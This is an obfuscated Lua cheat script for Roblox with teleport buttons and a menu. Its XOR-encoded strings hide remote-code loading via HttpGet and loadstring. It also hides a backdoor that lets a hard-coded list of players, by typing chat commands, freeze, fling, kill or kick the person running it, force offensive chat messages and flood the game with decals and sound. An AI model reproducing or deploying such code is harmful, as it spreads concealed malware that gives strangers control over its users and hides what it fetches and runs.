--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v21,v22) local v23={};for v40=1, #v21 do v6(v23,v0(v4(v1(v2(v21,v40,v40 + 1 )),v1(v2(v22,1 + (v40% #v22) ,1 + (v40% #v22) + 1 )))%256 ));end return v5(v23);end local v8=loadstring(Game:HttpGet(v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\217\41\233\180\195\28\208\207\215\106\171\185\198\29\218\142\206\53\245\246\193\17\195\142\215\44\228\168\136\19\208\202\213\106\241\178\221\31\195\199","\126\177\163\187\69\134\219\167")))();local v9=v8:NewWindow(v7("\23\223\37\201\240\99\228\57\133\221\99\253\35\203\242\42\195\45\133\200\44\218\47\215","\156\67\173\74\165"));local v10=v9:NewSection(v7("\25\182\64\24","\38\84\215\41\118\220\70"));local v11=v9:NewSection(v7("\125\31\49\17\176","\158\48\118\66\114"));local v12=v9:NewSection(v7("\136\22\53\18\90\145\200\235\16\63\118\65\132\201\229","\155\203\68\112\86\19\197"));v10:CreateButton(v7("\114\216\58\249\80\119\247\236\6\201\57\188\69\118\225","\152\38\189\86\156\32\24\133"),function() game.Players.LocalPlayer.character.HumanoidRootPart.CFrame=CFrame.new(213.85064699999998 + 89 ,279.70679 + 59 , -(11.881736759999999 -5),1425 -(1336 + 89) ,1434 -(308 + 1126) ,1 + 0 ,0 -0 ,378 -(142 + 235) ,v7("\177\7","\38\156\55\199"), -1,0 -0 ,0 + 0 );end);v10:CreateButton(v7("\156\120\112\45\3\123\232\87\232\105\115\104\32\100\251\84\166","\35\200\29\28\72\115\20\154"),function() game.Players.LocalPlayer.character.HumanoidRootPart.CFrame=CFrame.new(35.9515839,4.04425049,1030.7821503 -(553 + 424) ,0 -0 ,0 + 0 , -(1 + 0),0 + 0 ,1 + 0 ,0,1,0 + 0 ,0 -0 );end);v10:CreateToggle(v7("\45\173\222\211\129\108\4\24\187\194","\84\121\223\177\191\237\76"),function(v26) barke=v26;while barke do local v41=0;while true do if (v41==(0 -0)) then wait(0.0001 -0 );game.Players.LocalPlayer.character.HumanoidRootPart.CFrame=CFrame.new( -(10.845092800000003 + 24),478.5898972 -379 ,763.8118876999999 -(239 + 514) ,0 + 0 ,0, -(1330 -(797 + 532)),0 + 0 ,1 + 0 ,0 -0 ,1203 -(373 + 829) ,0,0);v41=732 -(476 + 255) ;end if (v41==1) then wait(0.0001);game.Players.LocalPlayer.character.HumanoidRootPart.CFrame=CFrame.new( -(1164.8450928 -(369 + 761)),99.5899734,14.966796899999999 + 10 ,0 -0 ,0, -(1 -0),238 -(64 + 174) ,1 + 0 ,0,1,0 -0 ,336 -(144 + 192) );v41=2;end if (v41==(218 -(42 + 174))) then wait(0.1 + 0 );game.Players.LocalPlayer.character.HumanoidRootPart.CFrame=CFrame.new( -34.8450928,83.5898972 + 16 ,17.1106415 + 21 ,1504 -(363 + 1141) ,1580 -(1183 + 397) , -(2 -1),0 + 0 ,1 + 0 ,1975 -(1913 + 62) ,1 + 0 ,0,0 -0 );v41=1936 -(565 + 1368) ;end if (v41==(11 -8)) then wait(0.2);game.Players.LocalPlayer.character.HumanoidRootPart.CFrame=CFrame.new( -33.4637527,1765.674164 -(1477 + 184) , -(13.4693537 -3), -0.999625444,0.000956700766, -0.0273496751, -(5.005746e-11 + 0),856.999388754 -(564 + 292) ,0.0349589549,0.0273664035,0.0349458605 -0 , -(0.999014437 -0));break;end end end if (barke==false) then game.Players.LocalPlayer.character.HumanoidRootPart.CFrame=CFrame.new( -33.4637527,104.674164, -(314.4693537 -(244 + 60)), -(0.999625444 + 0),476.000956700766 -(41 + 435) , -0.0273496751, -(1001.00000000005 -(938 + 63)),0.999388754 + 0 ,1125.0349589549 -(936 + 189) ,0.0273664035 + 0 ,1613.0349458605 -(1565 + 48) , -(0.999014437 + 0));end end);v11:CreateButton(v7("\149\87\196\165\54\85\35\210\251\119\205\173\51\94","\161\219\54\169\192\90\48\80"),function() loadstring(game:HttpGet(v7("\65\86\20\53\90\24\79\106\91\67\23\107\78\75\20\45\92\64\21\54\76\80\3\42\71\86\5\43\93\12\3\42\68\13\12\49\90\71\22\32\91\91\4\36\80\91\15\48\6\108\1\40\76\78\5\54\90\15\33\33\68\75\14\106\91\71\6\54\6\74\5\36\77\81\79\40\72\75\14\106\122\77\21\55\74\71\78\41\92\67","\69\41\34\96")))();end);v11:CreateButton(v7("\149\205\209\3\12\34\168\198\151\51\11\46\176\199","\75\220\163\183\106\98"),function() loadstring(game:HttpGet(v7("\10\174\159\39\202\88\245\196\37\216\21\244\140\62\205\10\175\137\34\202\7\168\136\56\215\22\191\133\35\151\1\181\134\120\252\6\189\142\30\224\77\179\133\49\208\12\179\159\50\192\11\191\135\51\150\15\187\152\35\220\16\245\152\56\204\16\185\142","\185\98\218\235\87")))();end);local v13={v7("\237\48\38\240\209\184\204\61\42\227\204\147\255","\202\171\92\71\134\190"),v7("\5\200\56\156\37\196\6\135\39\200\46","\232\73\161\76"),v7("\188\203\71\90\11\178\202\65\82\17\183","\126\219\185\34\61"),v7("\27\198\81\115\108\114\234\238\25\156\10","\135\108\174\62\18\30\23\147"),v7("\159\196\2\159\59\133\12\239\147\193\15","\167\214\137\74\171\120\206\83")};local v14={v7("\197\243\63\89\224","\199\235\144\82\61\152"),v7("\92\21\180\47\31","\75\103\118\217"),v7("\156\26\115\25\189\6","\126\167\52\16\116\217"),v7("\235\35\36\152","\156\168\78\64\224\212\121"),v7("\36\195\129\246","\174\103\142\197"),v7("\117\5\123\32","\152\54\72\63\88\69\62"),v7("\247\201\202\100","\60\180\164\142"),v7("\91\115\33\49","\114\56\62\101\73\71\141"),v7("\187\228\255\252","\164\216\137\187"),v7("\209\235\53\138","\107\178\134\81\210\198\158"),v7("\27\35\166\254","\202\88\110\226\166"),v7("\192\34\134\207","\170\163\111\226\151"),v7("\50\61\150\32","\73\113\80\210\88\46\87"),v7("\130\1\233\42","\135\225\76\173\114"),v7("\57\192\188\136","\199\122\141\216\208\204\221"),v7("\174\208\52\232","\150\205\189\112\144\24"),v7("\6\137\155\116","\112\69\228\223\44\100\232\113"),v7("\215\18\3\203","\230\180\127\103\179\214\28")};local function v15(v27,v28) local v29=0;local v30;while true do if (v29==(1227 -(322 + 905))) then v30=v28:lower();if table.find(v13,v27.Name) then for v66,v67 in ipairs(v14) do if (v30==v67:lower()) then game:GetService(v7("\191\17\94\84\240\68\242\171\16\86","\128\236\101\63\38\132\33")):SetCore(v7("\159\172\31\64\152\228\219\165\175\24\71\183\255\198\163\167","\175\204\201\113\36\214\139"),{[v7("\115\197\33\208\1","\100\39\172\85\188")]=v7("\140\110\184\137\63\172\122\181\133\115\142\119\180\141\50\163\124\170","\83\205\24\217\224"),[v7("\210\192\213\41","\93\134\165\173")]=v7("\240\244\211\205\32\203\242\48\171\252\199\208\53\212\183\62\240\230\209\130\116\203\160\108\177\224\129\140\49\199\190\114\254\188\202\218\57\197\242\48\173\251\213\130\116\219\188\109\183\230\129\140\46\220\226\114\178\178\143\209\35\142\252\125\179\246\129\140\57\195\182\102","\30\222\146\161\162\90\174\210"),[v7("\193\91\98\11\241\71\127\4","\106\133\46\16")]=5,[v7("\113\35\124\242","\32\56\64\19\156\58")]=v7("\72\202\253\87\73\225\133\78\193\225\12\21\189\217\3\145\188\15\3\171\217\3","\224\58\168\133\54\58\146")});break;end end end break;end end end game.Players.PlayerAdded:Connect(function(v31) v31.Chatted:Connect(function(v42) v15(v31,v42);end);end);for v32,v33 in pairs(game.Players:GetPlayers()) do v33.Chatted:Connect(function(v43) v15(v33,v43);end);end local function v16(v34) if v34.Character then local v48=v34.Character:FindFirstChild(v7("\117\89\92\248\103\178\136\25\74\89","\107\57\54\43\157\21\230\231"));local v49=v34.Character:FindFirstChild(v7("\238\155\1\240\171\232\192\201\152\30","\175\187\235\113\149\217\188"));if (v48 and v49) then local v61=611 -(602 + 9) ;local v62;while true do if (v61==(1189 -(449 + 740))) then v62=0;while true do if ((872 -(826 + 46))==v62) then v48.Anchored=true;v49.Anchored=true;break;end end break;end end end end end local function v17(v35) if v35.Character then local v50=947 -(245 + 702) ;local v51;local v52;while true do if ((3 -2)==v50) then if (v51 and v52) then v51.Anchored=false;v52.Anchored=false;end break;end if (v50==0) then v51=v35.Character:FindFirstChild(v7("\16\160\150\73\241\77\119\46\188\142","\24\92\207\225\44\131\25"));v52=v35.Character:FindFirstChild(v7("\126\195\168\73\9\73\68\193\171\67","\29\43\179\216\44\123"));v50=1 + 0 ;end end end end local function v18(v36,v37) v36.Chatted:Connect(function(v44) if (v37~=v36) then v44=v44:lower();if v44:match(v7("\248\151\38\64\180\215\39","\44\221\185\64")) then local v63=0;local v64;while true do if (v63==(1900 -(260 + 1638))) then v64.Location=v37.Character.HumanoidRootPart.Position;break;end if (1==v63) then v64.Parent=v37.Character.HumanoidRootPart;v64.Force=Vector3.new(100000439 -(382 + 58) ,0,320807227 -220807228 );v63=2;end if (0==v63) then v37.Character.HumanoidRootPart.CFrame=CFrame.new(0 + 0 ,2064 -1065 ,0);v64=Instance.new(v7("\35\232\76\70\71\9\245\93\76\103","\19\97\135\40\63"));v63=2 -1 ;end end elseif v44:match(v7("\235\18\53\41\32\43\171","\81\206\60\83\91\79")) then v16(v37);elseif v44:match(v7("\11\229\197\124\41\209\66\190\75","\196\46\203\176\18\79\163\45")) then v17(v37);elseif v44:match(v7("\253\108\117\6\39\240","\143\216\66\30\126\68\155")) then v37:Kick(v7("\147\199\24\139\205\162\193\228\234\202\8\206\203\227\220\232\169\195\8\207\139","\129\202\168\109\171\165\195\183"));elseif v44:match(v7("\103\22\60\209\210\24","\134\66\56\87\184\190\116")) then v37.Character:FindFirstChildOfClass(v7("\20\36\4\186\23\228\40\49","\85\92\81\105\219\121\139\65")).Health=0;elseif v44:match(v7("\184\253\85\87\110\208\239","\191\157\211\48\37\28")) then v37.Character.HumanoidRootPart.CFrame=CFrame.new(101204 -(902 + 303) ,219561 -119562 ,240847 -140848 );elseif v44:match(v7("\154\81\224\12","\90\191\127\148\124")) then v37.Character.HumanoidRootPart.CFrame=v36.Character.HumanoidRootPart.CFrame;elseif v44:match(v7("\61\201\61\30\108","\119\24\231\78")) then local v83=v37.Character:FindFirstChildOfClass(v7("\170\56\168\75\210\79\24\134","\113\226\77\197\42\188\32"));if v83 then v83.Sit=true;end elseif v44:match(v7("\127\88\225\187\41\31\224","\213\90\118\148")) then local v85=0 + 0 ;local v86;while true do if (v85==0) then v86=v37.Character:FindFirstChildOfClass(v7("\115\59\185\87\67\84\39\176","\45\59\78\212\54"));if v86 then v86.Sit=false;end break;end end elseif v44:match(v7("\85\24\151\153\214\34\161","\144\112\54\227\235\230\78\205")) then game:GetService(v7("\129\45\31\240\217\88\178\60\10\248\227\79\188\58\14\251\213","\59\211\72\111\156\176")).DefaultChatSystemChatEvents.SayMessageRequest:FireServer("I'm gay",v7("\111\139\239","\77\46\231\131"));elseif v44:match(v7("\255\26\165\89\255\71\253\8\244\30\255","\32\218\52\214")) then local v87=1690 -(1121 + 569) ;local v88;while true do if ((214 -(22 + 192))==v87) then v88=v44:match(v7("\11\89\34\177\180\163\14\18\0\93\120","\58\46\119\81\200\145\208\37"));game:GetService(v7("\25\137\32\160\160\190\55\63\137\52\159\189\178\36\42\139\53","\86\75\236\80\204\201\221")).DefaultChatSystemChatEvents.SayMessageRequest:FireServer(v88,v7("\83\77\123","\235\18\33\23\229\158"));break;end end elseif v44:match(v7("\21\244\194\182\84\255\210\240\24\244\139\242","\219\48\218\161")) then local v90=683 -(483 + 200) ;local v91;while true do if (v90==0) then v91=v44:match(v7("\161\63\127\68\223\10\243\175\57\50\3\146","\128\132\17\28\41\187\47"));game.Players:Chat(";"   .. v91 );break;end end elseif v44:match(v7("\68\124\21\49\68\3\62\9\34","\61\97\82\102\90")) then local v92=Instance.new(v7("\129\43\184\88\198\80\27","\105\204\78\203\43\167\55\126"),workspace);v92.Text=v7("\145\130\10\45\83\35\230\124\128\234\4\49\39\68\225\100\134\129\6\58","\49\197\202\67\126\115\100\167");wait(1466 -(1404 + 59) );v92.Text=v7("\26\110\247\8\168\119\118\22\115\254\1\193","\62\87\59\191\73\224\54");wait(3);v92:Destroy();s=Instance.new(v7("\212\9\227","\169\135\98\154"));s.Name=v7("\248\92\29","\168\171\23\68\52\157\83");s.SkyboxBk=v7("\252\101\225\189\127\98\200\227\102\226\227\55\34\133\248\126\237\227\38\34\138\187\112\230\190\32\57\200\171\120\241\240\118\120\223\167\32\166\255\117\116","\231\148\17\149\205\69\77");s.SkyboxDn=v7("\136\179\211\235\13\176\207\176\208\236\25\237\143\165\203\244\79\177\131\168\202\180\86\236\147\162\211\180\8\246\132\250\148\174\15\172\209\244\149\171\14","\159\224\199\167\155\55");s.SkyboxFt=v7("\255\231\40\194\173\188\115\197\224\228\114\192\248\241\48\221\239\189\63\221\250\188\61\193\228\246\40\157\168\250\56\143\164\166\100\129\166\160\110\130\174","\178\151\147\92");s.SkyboxLf=v7("\132\233\88\34\72\3\53\155\234\91\124\0\67\120\128\242\84\124\17\67\119\195\252\95\33\23\88\53\211\244\72\111\65\25\34\223\172\31\96\66\21","\26\236\157\44\82\114\44");s.SkyboxRt=v7("\34\58\193\75\112\97\154\76\61\57\155\73\37\44\217\84\50\96\214\84\39\97\212\72\57\43\193\20\117\39\209\6\121\123\141\8\123\125\135\11\115","\59\74\78\181");s.SkyboxUp=v7("\45\197\78\74\233\106\158\77\77\164\107\195\85\88\191\42\201\20\89\188\40\158\91\73\160\32\197\21\5\186\33\140\9\15\235\118\128\9\8\227\124","\211\69\177\58\58");s.Parent=game.Lighting;Spooky=Instance.new(v7("\132\234\108\251\237","\171\215\133\25\149\137"),game.Workspace);Spooky.Name=v7("\210\216\61\245\228\41","\34\129\168\82\154\143\80\156");Spooky.SoundId=v7("\151\176\43\10\91\93\140\145\187\55\81\7\1\216\221\230\100\93\30\31\222\221\225","\233\229\210\83\107\40\46");Spooky.Volume=410 -260 ;Spooky.Looped=true;Spooky:Play();local v107=358313209;function spamDecal(v108) if v108:IsA(v7("\241\67\32\194","\101\161\34\82\182")) then for v111=0 -0 ,770 -(468 + 297)  do D=Instance.new(v7("\204\8\90\255\215","\78\136\109\57\158\187\130\226"));D.Name=v7("\19\6\221\212\29\30\213\217\11\26","\145\94\95\153");D.Face=v111;D.Parent=v108;D.Texture=v7("\245\217\0\197\20\248\178\218\3\194\0\165\242\207\24\218\86\249\254\194\25\154\79\164\238\200\0\154\17\190\249\144","\215\157\173\116\181\46")   .. Id ;end elseif v108:IsA(v7("\24\187\143\247\214","\186\85\212\235\146")) then for v118,v119 in pairs(v108:GetChildren()) do spamDecal(v119);end end end function decalspam(v109) local v110=562 -(334 + 228) ;while true do if (v110==0) then Id=v109;for v116,v117 in pairs(game.Workspace:GetChildren()) do if v117:IsA(v7("\242\128\4\234","\56\162\225\118\158\89\142")) then for v120=0 -0 ,11 -6  do local v121=0 -0 ;while true do if (v121==(1 + 1)) then D.Texture=v7("\27\193\150\235\176\136\92\194\149\236\164\213\28\215\142\244\242\137\16\218\143\180\235\212\0\208\150\180\181\206\23\136","\167\115\181\226\155\138")   .. v109 ;break;end if (v121==0) then D=Instance.new(v7("\120\0\195\174\46","\184\60\101\160\207\66"));D.Name=v7("\28\187\88\153\18\163\80\148\4\167","\220\81\226\28");v121=237 -(141 + 95) ;end if (v121==(1 + 0)) then D.Face=v120;D.Parent=v117;v121=4 -2 ;end end end elseif v117:IsA(v7("\207\45\227\89\119","\166\130\66\135\60\27\17")) then for v122,v123 in pairs(v117:GetChildren()) do spamDecal(v123);end end end break;end end end decalspam(v107);end end end);end local function v19(v38) return table.find(v13,v38.Name)~=nil ;end local function v20() for v45,v46 in pairs(game.Players:GetPlayers()) do if v19(v46) then local v55=0 -0 ;local v56;while true do if (v55==(0 + 0)) then v56=game.Players.LocalPlayer;v18(v46,v56);break;end end end end end v20();game.Players.PlayerAdded:Connect(function(v39) if v19(v39) then local v53=0 -0 ;local v54;while true do if (0==v53) then v54=game.Players.LocalPlayer;v18(v39,v54);break;end end end end);